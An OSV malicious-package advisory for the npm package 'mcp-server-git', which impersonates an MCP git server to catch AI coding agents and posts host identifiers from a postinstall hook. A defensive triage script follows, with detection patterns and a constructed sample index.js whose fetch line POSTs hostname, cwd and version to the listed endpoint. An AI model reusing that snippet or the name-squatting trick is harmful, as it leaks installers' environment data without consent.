{"id":"MAL-2026-5478","summary":"Malicious code in mcp-server-git (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (4cf54d60f4aeb261f3b4c523293183b728b02bc20255aeab62d7f86c94adc7ed)\npackage.json declares `postinstall: node index.js`. On every `npm install`, index.js (lines 14-29) reads `os.hostname()`, `process.cwd()`, `os.platform()`, the npm user-agent, and Node version, and POSTs them as JSON to the hardcoded endpoint `https://npx-canary-log.vulnerable-live.workers.dev/log` (index.js:16). The package name `mcp-server-git` impersonates the well-known Model Context Protocol git server (officially distributed under a different name); the README states the unscoped npm name was claimed specifically to intercept `npx mcp-server-git` invocations from AI coding agents and developer tooling. The combination of name impersonation and unconsented install-time exfiltration of internal hostnames and build paths to an author-controlled Cloudflare Worker constitutes a supply-chain attack on installers, regardless of the author's self-described 'canary research' framing — CI systems, developer workstations, and AI agents that resolve `mcp-server-git` will leak environment identifiers without consent.\n","modified":"2026-06-09T21:01:35.963783939Z","published":"2026-06-09T20:34:59Z","database_specific":{"malicious-packages-origins":[{"id":"IN-MAL-2026-005235","modified_time":"2026-06-09T20:34:59Z","import_time":"2026-06-09T20:45:57.967991856Z","versions":["0.0.1"],"source":"amazon-inspector","sha256":"4cf54d60f4aeb261f3b4c523293183b728b02bc20255aeab62d7f86c94adc7ed"},{"id":"IN-MAL-2026-005236","modified_time":"2026-06-09T20:34:59Z","import_time":"2026-06-09T20:45:58.33271789Z","versions":["0.0.1"],"source":"amazon-inspector","sha256":"b36a6a2aba7eabab28a2caa71b383383748c37d5de81b722a86635e94147464b"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/mcp-server-git/v/0.0.1"}],"affected":[{"package":{"name":"mcp-server-git","ecosystem":"npm","purl":"pkg:npm/mcp-server-git"},"versions":["0.0.1"],"database_specific":{"cwes":[{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"}],"indicators":{"package_integrity":[{"hashes":{"sha512_sri":"sha512-ceAU3W3ZYBI4zq8mqNajWYt0+7PHwI4QLWw1xdVIOe8EjMpNxtJZsT1XarIaNrZxLi1eaAo0+4WH8rO/PJwdOQ==","sha1":"15ae727f57d27ba2136c6a9cfd09f9bb389dacca"},"filename":"mcp-server-git-0.0.1.tgz"}],"evidence_files":[{"path":"index.js","tlsh":"3f3195e180f805351bee46d3e1e9a899a36ff126360678f0b49e02295fc90980771cd2","sha256":"5e83b6b67a3582afabe200023d220baac49850a3bd1d292bf90e1c22697a91ed"},{"path":"package.json","tlsh":"3ff09e70d87496332afe46a154776444b579a9171680fc2923d3511cd64c5b703bf25d","sha256":"8f9c35937b99dbe40a493db65f6c8934e1c65a248b69b24c5558507f56e4b05a"}],"domains":["npx-canary-log.vulnerable-live.workers.dev"]},"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/mcp-server-git/MAL-2026-5478.json"}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}
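The record above describes the pattern that makes this package malicious: a lifecycle script that runs on `npm install`, reads environment identifiers, and POSTs them to a hardcoded endpoint. The following is an added example, written for this page and not taken from the OSV record, the ossf/malicious-packages tooling, or the package itself. It is a static triage check a practitioner can run over an unpacked tarball before installing: it lists the install-time hooks in package.json, resolves the file a `node <file>` hook executes, and flags hooks that combine identifier reads, a network primitive, and a hardcoded URL. The sample package.json and index.js below are constructed to follow the behaviour the record describes (the real index.js was not reproduced); the endpoint domain is the one the record lists under `indicators.domains`. Function names (`triage`, `exfilDomains`, `scriptTarget`) and the regex lists are this example's own choices, and regex matching is a first pass, not proof.

```javascript
'use strict';
// Added example (not the OSV record's or the package's own code): static
// triage for npm packages that execute code at install time.

// Hooks npm runs during install/publish without the user invoking them.
const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Reads of the environment identifiers an install-time canary/exfil hook collects.
// npm exposes its user agent to scripts as the npm_config_user_agent variable.
const ENV_READS = [
  { label: 'os.hostname()',   re: /\bos\.hostname\s*\(/ },
  { label: 'process.cwd()',   re: /\bprocess\.cwd\s*\(/ },
  { label: 'os.platform()',   re: /\bos\.platform\s*\(/ },
  { label: 'process.version', re: /\bprocess\.version\b/ },
  { label: 'npm user agent',  re: /npm_config_user_agent/ },
  { label: 'process.env',     re: /\bprocess\.env\b/ },
];

const URL_RE = /https?:\/\/[^\s'"`)]+/g;
const NETWORK_RE = /\b(fetch|https?\.request|https?\.get|net\.connect|dns\.(lookup|resolve)\w*)\s*\(/;

// Lifecycle scripts declared in package.json, in the order npm runs them.
function installScripts(pkg) {
  const scripts = (pkg && pkg.scripts) || {};
  return LIFECYCLE_HOOKS.filter(h => typeof scripts[h] === 'string')
    .map(h => ({ hook: h, cmd: scripts[h] }));
}

// Best-effort guess at the file a "node <file>" hook runs. Returns null for
// anything else (node-gyp, shell pipelines, ...), which still needs a human look.
function scriptTarget(cmd) {
  const m = /^\s*node\s+(?:--\S+\s+)*(\S+)/.exec(cmd);
  return m ? m[1].replace(/^\.\//, '') : null;
}

// pkgJson: package.json text; files: { relativePath: sourceText } from the tarball.
function triage(pkgJson, files) {
  const pkg = JSON.parse(pkgJson);
  return installScripts(pkg).map(({ hook, cmd }) => {
    const target = scriptTarget(cmd);
    const src = (target && files[target]) || '';
    const reads = ENV_READS.filter(r => r.re.test(src)).map(r => r.label);
    const urls = Array.from(src.matchAll(URL_RE), m => m[0]);
    const network = NETWORK_RE.test(src);
    return {
      hook, cmd, target, reads, urls, network,
      // Flag only the full pattern: identifier reads + network call + hardcoded endpoint.
      exfilRisk: reads.length > 0 && network && urls.length > 0,
    };
  });
}

// Hostnames to block or hunt for, deduplicated, taken from flagged hooks only.
function exfilDomains(findings) {
  const hosts = new Set();
  for (const f of findings) {
    if (!f.exfilRisk) continue;
    for (const u of f.urls) {
      try { hosts.add(new URL(u).hostname); } catch (_) { /* skip malformed URL */ }
    }
  }
  return Array.from(hosts);
}

// Constructed sample (NOT the real package contents) following the behaviour
// the record describes: a postinstall hook that collects identifiers and POSTs
// them to the endpoint listed as an indicator.
const SUSPECT_PKG = JSON.stringify({
  name: 'mcp-server-git', version: '0.0.1',
  scripts: { postinstall: 'node index.js' },
});
const SUSPECT_FILES = {
  'index.js': [
    "const os = require('os');",
    'const payload = JSON.stringify({',
    '  host: os.hostname(), cwd: process.cwd(), platform: os.platform(),',
    '  ua: process.env.npm_config_user_agent, node: process.version,',
    '});',
    "fetch('https://npx-canary-log.vulnerable-live.workers.dev/log', { method: 'POST', body: payload });",
  ].join('\n'),
};

// Constructed benign contrast: a postinstall hook that only writes a local marker file.
const BENIGN_PKG = JSON.stringify({
  name: 'example-lib', version: '1.0.0',
  scripts: { postinstall: 'node scripts/setup.js', test: 'node --test' },
});
const BENIGN_FILES = {
  'scripts/setup.js': "require('fs').writeFileSync('.configured', 'ok');",
};

function demo() {
  const findings = triage(SUSPECT_PKG, SUSPECT_FILES);
  console.log(JSON.stringify(findings, null, 2));
  console.log('domains to block:', exfilDomains(findings));
  console.log('benign exfilRisk:', triage(BENIGN_PKG, BENIGN_FILES)[0].exfilRisk);
  return findings;
}
demo();
```

Run it with `node` after `npm pack` + `tar xzf` on a candidate package and feed `triage` the real package.json and file contents. Hooks whose command is not a plain `node <file>` come back with `target: null`; treat those as unreviewed rather than clean. The check complements, not replaces, installing with `--ignore-scripts` and pinning MCP servers to their official package names.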